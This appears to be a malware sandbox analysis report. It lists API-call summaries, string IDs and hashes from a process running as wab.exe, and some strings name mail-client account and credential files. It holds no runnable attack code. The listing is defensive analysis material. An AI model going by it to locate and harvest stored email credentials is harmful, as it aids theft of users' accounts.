                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21CB122A
                                  • Part of subcall function 21CB173A: _strlen.LIBCMT ref: 21CB1855
                                  • Part of subcall function 21CB173A: _strlen.LIBCMT ref: 21CB1869
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                • API String ID: 4036392271-1520055953
                                • Opcode ID: 278616c6eeefa3913ede2c4fd7dd2e0bc37b9fd9ff26c4ef5210e6f10de2fcde
                                • Instruction ID: 606c944f7459f1105ee69533623b44bc4bed075b0e5f4932161436d78d0e2b43
                                • Opcode Fuzzy Hash: 278616c6eeefa3913ede2c4fd7dd2e0bc37b9fd9ff26c4ef5210e6f10de2fcde
                                • Instruction Fuzzy Hash: A321A7BDE10248EAEB1097D1EC91FEE7339EF50B15F000556F604EB2D4E6B16E818759
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21CB4AEA,?,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000), ref: 21CB4B59
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21CB4B6C
                                • FreeLibrary.KERNEL32(00000000,?,?,?,21CB4AEA,?,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000,00000001,21CB2082), ref: 21CB4B8F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: f613bc552ee70421a33aa8f379400a465f9d62ccde19f89f342227eb2acb213e
                                • Instruction ID: a59c6a253c5337f1c8b065c3d5d6fcd18064eeb781226b61f53f0bc243bfbc20
                                • Opcode Fuzzy Hash: f613bc552ee70421a33aa8f379400a465f9d62ccde19f89f342227eb2acb213e
                                • Instruction Fuzzy Hash: 32F08C39940208EFDB059F90D80CFAEBFB9EF14396F0001A8EA07E2150DB369B41CB90
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 21CB715C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21CB717F
                                  • Part of subcall function 21CB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21CB5702
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21CB71A5
                                • _free.LIBCMT ref: 21CB71B8
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21CB71C7
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: e5229783c8666357ee149fb5482911835264a1aa6341d28606f7fb47972db87b
                                • Instruction ID: 5c9dccfc6170ada85dc5796d1aaaa2445eb88e7cb8b196754eadfc9be988d6c8
                                • Opcode Fuzzy Hash: e5229783c8666357ee149fb5482911835264a1aa6341d28606f7fb47972db87b
                                • Instruction Fuzzy Hash: CF01847E602315FF27110AF65C8CD7B6E6EDBD7AA4310017DBE08D7280EA658E0282B1
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000000,21CB636D,21CB5713,00000000,?,21CB2249,?,?,21CB1D66,00000000,?,?,00000000), ref: 21CB5B7F
                                • _free.LIBCMT ref: 21CB5BB4
                                • _free.LIBCMT ref: 21CB5BDB
                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB5BE8
                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB5BF1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 44410da7d9e0d2982edc8dee7e94003b5cc5001190a4158f5a73a6ad080da4b5
                                • Instruction ID: 35dd8f40069e8bebf1cab597fec427ab891ab05f36b0861a3b2a81b96b6b88dc
                                • Opcode Fuzzy Hash: 44410da7d9e0d2982edc8dee7e94003b5cc5001190a4158f5a73a6ad080da4b5
                                • Instruction Fuzzy Hash: 6401287E285702EF970726756C88D1F2A6DDBE66B47100028F816E2581EE79CF024A64
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,?,?,21CB10DF,?,?,?,00000000), ref: 21CB1E9A
                                • lstrcatW.KERNEL32(?,?), ref: 21CB1EAC
                                • lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EB3
                                • lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EC8
                                • lstrcatW.KERNEL32(?,21CB10DF), ref: 21CB1ED3
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$lstrcat
                                • String ID:
                                • API String ID: 493641738-0
                                • Opcode ID: 7109d8a9d37ab26c99dacfd214873597273cfe82b3d5430fc1daccd05728f1f9
                                • Instruction ID: 1e8a5dfcb0dfafb215353d12986dbe54800bc80b5b0be6d7467e8e4e60fdfa78
                                • Opcode Fuzzy Hash: 7109d8a9d37ab26c99dacfd214873597273cfe82b3d5430fc1daccd05728f1f9
                                • Instruction Fuzzy Hash: F8F0892A140114BAE6252759BC89E7F7B7CEFD6B64B04001DF608C31909B55594293B5
                                APIs
                                • _free.LIBCMT ref: 21CB91D0
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB91E2
                                • _free.LIBCMT ref: 21CB91F4
                                • _free.LIBCMT ref: 21CB9206
                                • _free.LIBCMT ref: 21CB9218
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 6b0406203d2fd456b0290bc81c4bc2d66eb0767c9004dc4c4cceb0434cd8d9b1
                                • Instruction ID: 838e2de9e1bcc74468722e80e3bf6dbe519122c14b34cde1e562ee5737715a3c
                                • Opcode Fuzzy Hash: 6b0406203d2fd456b0290bc81c4bc2d66eb0767c9004dc4c4cceb0434cd8d9b1
                                • Instruction Fuzzy Hash: 52F062B96A4250DF9614DF54E6C8C077FE9EB25310750180DF90AE7500CB38FE808B54
                                APIs
                                • _free.LIBCMT ref: 21CB536F
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB5381
                                • _free.LIBCMT ref: 21CB5394
                                • _free.LIBCMT ref: 21CB53A5
                                • _free.LIBCMT ref: 21CB53B6
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 98f054f01390b2b529302909cec859e6cb399d4b0a51e999f09b93fac0636e2d
                                • Instruction ID: 6a02750b0e1e914795a95dc3c67e6ec3fc4ecc0aff352adaee0a531434b6640c
                                • Opcode Fuzzy Hash: 98f054f01390b2b529302909cec859e6cb399d4b0a51e999f09b93fac0636e2d
                                • Instruction Fuzzy Hash: FCF05EBCAF5122DF86019F64A98C44E3FB1B73AB20301554AF853E3360DB3D0E028B89
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 21CB4C1D
                                • _free.LIBCMT ref: 21CB4CE8
                                • _free.LIBCMT ref: 21CB4CF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                • API String ID: 2506810119-3377118234
                                • Opcode ID: 19948453884b037ed392c46c6066d6c3f1b2c722aa8e29e010b8c4d4b7a64cc8
                                • Instruction ID: 0c385665e1d04650a78067505df63012a103827a406b2402798fe6bd447b3d81
                                • Opcode Fuzzy Hash: 19948453884b037ed392c46c6066d6c3f1b2c722aa8e29e010b8c4d4b7a64cc8
                                • Instruction Fuzzy Hash: FA31A379A48219EFDB11DF99D884D9EBBFCEBA6710F10409AE906D7200D7718F41CB91
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21CB6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 21CB8731
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 21CB87BA
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 21CB87CC
                                • __freea.LIBCMT ref: 21CB87D5
                                  • Part of subcall function 21CB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21CB5702
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                • String ID:
                                • API String ID: 2652629310-0
                                • Opcode ID: f9ca47580551cf4e3a52e3397537b252ca7bca6916c176a6b1579ede1ddfc4c2
                                • Instruction ID: 1282934926b36d275cbd667aba9b07fe3e70978802c3c32414d2b02e6c3348a7
                                • Opcode Fuzzy Hash: f9ca47580551cf4e3a52e3397537b252ca7bca6916c176a6b1579ede1ddfc4c2
                                • Instruction Fuzzy Hash: 5231CD7AA0021AEFEF158F64CC84EAF3BA9EB55314F100168FD04E7190E735DA60CBA0
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21CB1D66,00000000,00000000,?,21CB5C88,21CB1D66,00000000,00000000,00000000,?,21CB5E85,00000006,FlsSetValue), ref: 21CB5D13
                                • GetLastError.KERNEL32(?,21CB5C88,21CB1D66,00000000,00000000,00000000,?,21CB5E85,00000006,FlsSetValue,21CBE190,FlsSetValue,00000000,00000364,?,21CB5BC8), ref: 21CB5D1F
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21CB5C88,21CB1D66,00000000,00000000,00000000,?,21CB5E85,00000006,FlsSetValue,21CBE190,FlsSetValue,00000000), ref: 21CB5D2D
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 23e1b1708d464244a659e4cf006165a94a5c5c5a0f8428db1f60f2177a594c04
                                • Instruction ID: 04c995373f3f375dd0ccf28a625c8732b4732b8b0d1551db036397749dafc643
                                • Opcode Fuzzy Hash: 23e1b1708d464244a659e4cf006165a94a5c5c5a0f8428db1f60f2177a594c04
                                • Instruction Fuzzy Hash: E301F73E645222EBC3164A79AC4CE573B5CAF166E57100724FA0AD7180D725DB03CBE1
                                APIs
                                • _free.LIBCMT ref: 21CB655C
                                  • Part of subcall function 21CB62BC: IsProcessorFeaturePresent.KERNEL32(00000017,21CB62AB,00000000,?,?,?,?,00000016,?,?,21CB62B8,00000000,00000000,00000000,00000000,00000000), ref: 21CB62BE
                                  • Part of subcall function 21CB62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 21CB62E0
                                  • Part of subcall function 21CB62BC: TerminateProcess.KERNEL32(00000000), ref: 21CB62E7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                • String ID: *?$.
                                • API String ID: 2667617558-3972193922
                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                • Instruction ID: d120f23bdb77a190c8aad443939a06b9b3bc3e528bf1884eba582b126c011226
                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                • Instruction Fuzzy Hash: 9F51B279E0022AEFDB05DFA8C880AADBBF5FF59314F248169D454E7344E6359B058B90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: : $Se.
                                • API String ID: 4218353326-4089948878
                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                • Instruction ID: c83eb5dc4f6a94026b6ef68905611a0e8765606a4d877dafad30926977ff6b93
                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                • Instruction Fuzzy Hash: 4C11E379904289AECB11CFA8E880BDEFBFCAF29314F10405AE545E7212E6705B06CB65
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 21CB2903
                                  • Part of subcall function 21CB35D2: RaiseException.KERNEL32(?,?,?,21CB2925,00000000,00000000,00000000,?,?,?,?,?,21CB2925,?,21CC21B8), ref: 21CB3632
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 21CB2920
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: Exception@8Throw$ExceptionRaise
                                • String ID: Unknown exception
                                • API String ID: 3476068407-410509341
                                • Opcode ID: b86ff3ea560222d7ac9be9fd5c1eaf17f2ce193762b83e5c5b20e82a2fa89287
                                • Instruction ID: 8a77837ab195007e1a5cf01d9a3c8bcaa18e0d167b0933283485568214a53a90
                                • Opcode Fuzzy Hash: b86ff3ea560222d7ac9be9fd5c1eaf17f2ce193762b83e5c5b20e82a2fa89287
                                • Instruction Fuzzy Hash: 8EF0A43D90420EFB8B04AAA6EC44DAA776C9B21760B504174BA14E6098EB32FF15C5C1

                                Execution Graph

                                Execution Coverage:6.1%
                                Dynamic/Decrypted Code Coverage:9.2%
                                Signature Coverage:2.3%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:75
                                execution_graph 40311 441819 40314 430737 40311->40314 40313 441825 40315 430756 40314->40315 40327 43076d 40314->40327 40316 430774 40315->40316 40317 43075f 40315->40317 40329 43034a memcpy 40316->40329 40328 4169a7 11 API calls 40317->40328 40320 4307ce 40321 430819 memset 40320->40321 40330 415b2c 11 API calls 40320->40330 40321->40327 40322 43077e 40322->40320 40325 4307fa 40322->40325 40322->40327 40324 4307e9 40324->40321 40324->40327 40331 4169a7 11 API calls 40325->40331 40327->40313 40328->40327 40329->40322 40330->40324 40331->40327 37669 442ec6 19 API calls 37843 4152c6 malloc 37844 4152e2 37843->37844 37845 4152ef 37843->37845 37847 416760 11 API calls 37845->37847 37847->37844 37848 4466f4 37867 446904 37848->37867 37850 446700 GetModuleHandleA 37853 446710 __set_app_type __p__fmode __p__commode 37850->37853 37852 4467a4 37854 4467ac __setusermatherr 37852->37854 37855 4467b8 37852->37855 37853->37852 37854->37855 37868 4468f0 _controlfp 37855->37868 37857 4467bd _initterm __wgetmainargs _initterm 37858 44681e GetStartupInfoW 37857->37858 37859 446810 37857->37859 37861 446866 GetModuleHandleA 37858->37861 37869 41276d 37861->37869 37865 446896 exit 37866 44689d _cexit 37865->37866 37866->37859 37867->37850 37868->37857 37870 41277d 37869->37870 37912 4044a4 LoadLibraryW 37870->37912 37872 412785 37903 412789 37872->37903 37920 414b81 37872->37920 37875 4127c8 37926 412465 memset ??2@YAPAXI 37875->37926 37877 4127ea 37938 40ac21 37877->37938 37882 412813 37956 40dd07 memset 37882->37956 37883 412827 37961 40db69 memset 37883->37961 37887 412822 37982 4125b6 ??3@YAXPAX 37887->37982 37888 40ada2 _wcsicmp 37889 41283d 37888->37889 37889->37887 37892 412863 CoInitialize 37889->37892 37966 41268e 37889->37966 37986 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37892->37986 37896 41296f 37988 40b633 37896->37988 37898 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37904 412957 37898->37904 37909 4128ca 37898->37909 37903->37865 37903->37866 37904->37887 37905 4128d0 TranslateAcceleratorW 37906 412941 GetMessageW 37905->37906 37905->37909 37906->37904 37906->37905 37907 412909 IsDialogMessageW 37907->37906 37907->37909 37908 4128fd IsDialogMessageW 37908->37906 37908->37907 37909->37905 37909->37907 37909->37908 37910 41292b TranslateMessage DispatchMessageW 37909->37910 37911 41291f IsDialogMessageW 37909->37911 37910->37906 37911->37906 37911->37910 37913 4044f7 37912->37913 37914 4044cf GetProcAddress 37912->37914 37918 404507 MessageBoxW 37913->37918 37919 40451e 37913->37919 37915 4044e8 FreeLibrary 37914->37915 37917 4044df 37914->37917 37915->37913 37916 4044f3 37915->37916 37916->37913 37917->37915 37918->37872 37919->37872 37921 414b8a 37920->37921 37922 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37920->37922 37992 40a804 memset 37921->37992 37922->37875 37925 414b9e GetProcAddress 37925->37922 37927 4124e0 37926->37927 37928 412505 ??2@YAPAXI 37927->37928 37929 41251c 37928->37929 37931 412521 37928->37931 38014 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37929->38014 38003 444722 37931->38003 37937 41259b wcscpy 37937->37877 38019 40b1ab ??3@YAXPAX ??3@YAXPAX 37938->38019 37942 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37945 40ac5c 37942->37945 37943 40ad4b 37951 40ad76 37943->37951 38043 40a9ce 37943->38043 37945->37942 37945->37943 37946 40ace7 ??3@YAXPAX 37945->37946 37945->37951 38023 40a8d0 37945->38023 38035 4099f4 37945->38035 37946->37945 37950 40a8d0 7 API calls 37950->37951 38020 40aa04 37951->38020 37952 40ada2 37953 40adc9 37952->37953 37954 40adaa 37952->37954 37953->37882 37953->37883 37954->37953 37955 40adb3 _wcsicmp 37954->37955 37955->37953 37955->37954 38048 40dce0 37956->38048 37958 40dd3a GetModuleHandleW 38053 40dba7 37958->38053 37962 40dce0 3 API calls 37961->37962 37963 40db99 37962->37963 38125 40dae1 37963->38125 38139 402f3a 37966->38139 37968 412766 37968->37887 37968->37892 37969 4126d3 _wcsicmp 37970 4126a8 37969->37970 37970->37968 37970->37969 37972 41270a 37970->37972 38173 4125f8 7 API calls 37970->38173 37972->37968 38142 411ac5 37972->38142 37983 4125da 37982->37983 37984 4125f0 37983->37984 37985 4125e6 DeleteObject 37983->37985 37987 40b1ab ??3@YAXPAX ??3@YAXPAX 37984->37987 37985->37984 37986->37898 37987->37896 37989 40b640 37988->37989 37990 40b639 ??3@YAXPAX 37988->37990 37991 40b1ab ??3@YAXPAX ??3@YAXPAX 37989->37991 37990->37989 37991->37903 37993 40a83b GetSystemDirectoryW 37992->37993 37994 40a84c wcscpy 37992->37994 37993->37994 37999 409719 wcslen 37994->37999 37997 40a881 LoadLibraryW 37998 40a886 37997->37998 37998->37922 37998->37925 38000 409724 37999->38000 38001 409739 wcscat LoadLibraryW 37999->38001 38000->38001 38002 40972c wcscat 38000->38002 38001->37997 38001->37998 38002->38001 38004 444732 38003->38004 38005 444728 DeleteObject 38003->38005 38015 409cc3 38004->38015 38005->38004 38007 412551 38008 4010f9 38007->38008 38009 401130 38008->38009 38010 401134 GetModuleHandleW LoadIconW 38009->38010 38011 401107 wcsncat 38009->38011 38012 40a7be 38010->38012 38011->38009 38013 40a7d2 38012->38013 38013->37937 38013->38013 38014->37931 38018 409bfd memset wcscpy 38015->38018 38017 409cdb CreateFontIndirectW 38017->38007 38018->38017 38019->37945 38021 40aa14 38020->38021 38022 40aa0a ??3@YAXPAX 38020->38022 38021->37952 38022->38021 38024 40a8eb 38023->38024 38025 40a8df wcslen 38023->38025 38026 40a906 ??3@YAXPAX 38024->38026 38027 40a90f 38024->38027 38025->38024 38028 40a919 38026->38028 38029 4099f4 3 API calls 38027->38029 38030 40a932 38028->38030 38031 40a929 ??3@YAXPAX 38028->38031 38029->38028 38033 4099f4 3 API calls 38030->38033 38032 40a93e memcpy 38031->38032 38032->37945 38034 40a93d 38033->38034 38034->38032 38036 409a41 38035->38036 38037 4099fb malloc 38035->38037 38036->37945 38039 409a37 38037->38039 38040 409a1c 38037->38040 38039->37945 38041 409a30 ??3@YAXPAX 38040->38041 38042 409a20 memcpy 38040->38042 38041->38039 38042->38041 38044 40a9e7 38043->38044 38045 40a9dc ??3@YAXPAX 38043->38045 38046 4099f4 3 API calls 38044->38046 38047 40a9f2 38045->38047 38046->38047 38047->37950 38072 409bca GetModuleFileNameW 38048->38072 38050 40dce6 wcsrchr 38051 40dcf5 38050->38051 38052 40dcf9 wcscat 38050->38052 38051->38052 38052->37958 38073 44db70 38053->38073 38055 40dbb4 memset memset 38075 409bca GetModuleFileNameW 38055->38075 38057 40dbfd 38076 4447d9 38057->38076 38060 40dc34 wcscpy wcscpy 38102 40d6f5 38060->38102 38061 40dc1f wcscpy 38061->38060 38064 40d6f5 3 API calls 38065 40dc73 38064->38065 38066 40d6f5 3 API calls 38065->38066 38067 40dc89 38066->38067 38068 40d6f5 3 API calls 38067->38068 38069 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38068->38069 38108 40da80 38069->38108 38072->38050 38074 44db77 38073->38074 38074->38055 38074->38074 38075->38057 38077 4447f4 38076->38077 38078 40dc1b 38077->38078 38079 444807 ??2@YAPAXI 38077->38079 38078->38060 38078->38061 38080 44481f 38079->38080 38081 444873 _snwprintf 38080->38081 38082 4448ab wcscpy 38080->38082 38115 44474a 8 API calls 38081->38115 38084 4448bb 38082->38084 38116 44474a 8 API calls 38084->38116 38085 4448a7 38085->38082 38085->38084 38087 4448cd 38117 44474a 8 API calls 38087->38117 38089 4448e2 38118 44474a 8 API calls 38089->38118 38091 4448f7 38119 44474a 8 API calls 38091->38119 38093 44490c 38120 44474a 8 API calls 38093->38120 38095 444921 38121 44474a 8 API calls 38095->38121 38097 444936 38122 44474a 8 API calls 38097->38122 38099 44494b 38123 44474a 8 API calls 38099->38123 38101 444960 ??3@YAXPAX 38101->38078 38103 44db70 38102->38103 38104 40d702 memset GetPrivateProfileStringW 38103->38104 38105 40d752 38104->38105 38106 40d75c WritePrivateProfileStringW 38104->38106 38105->38106 38107 40d758 38105->38107 38106->38107 38107->38064 38109 44db70 38108->38109 38110 40da8d memset 38109->38110 38111 40daac LoadStringW 38110->38111 38112 40dac6 38111->38112 38112->38111 38114 40dade 38112->38114 38124 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38112->38124 38114->37887 38115->38085 38116->38087 38117->38089 38118->38091 38119->38093 38120->38095 38121->38097 38122->38099 38123->38101 38124->38112 38135 409b98 GetFileAttributesW 38125->38135 38127 40daea 38128 40db63 38127->38128 38129 40daef wcscpy wcscpy GetPrivateProfileIntW 38127->38129 38128->37888 38136 40d65d GetPrivateProfileStringW 38129->38136 38131 40db3e 38137 40d65d GetPrivateProfileStringW 38131->38137 38133 40db4f 38138 40d65d GetPrivateProfileStringW 38133->38138 38135->38127 38136->38131 38137->38133 38138->38128 38174 40eaff 38139->38174 38143 411ae2 memset 38142->38143 38144 411b8f 38142->38144 38214 409bca GetModuleFileNameW 38143->38214 38156 411a8b 38144->38156 38146 411b0a wcsrchr 38147 411b22 wcscat 38146->38147 38148 411b1f 38146->38148 38215 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38147->38215 38148->38147 38150 411b67 38216 402afb 38150->38216 38154 411b7f 38272 40ea13 SendMessageW memset SendMessageW 38154->38272 38157 402afb 27 API calls 38156->38157 38158 411ac0 38157->38158 38159 4110dc 38158->38159 38160 41113e 38159->38160 38165 4110f0 38159->38165 38297 40969c LoadCursorW SetCursor 38160->38297 38162 411143 38298 4032b4 38162->38298 38316 444a54 38162->38316 38163 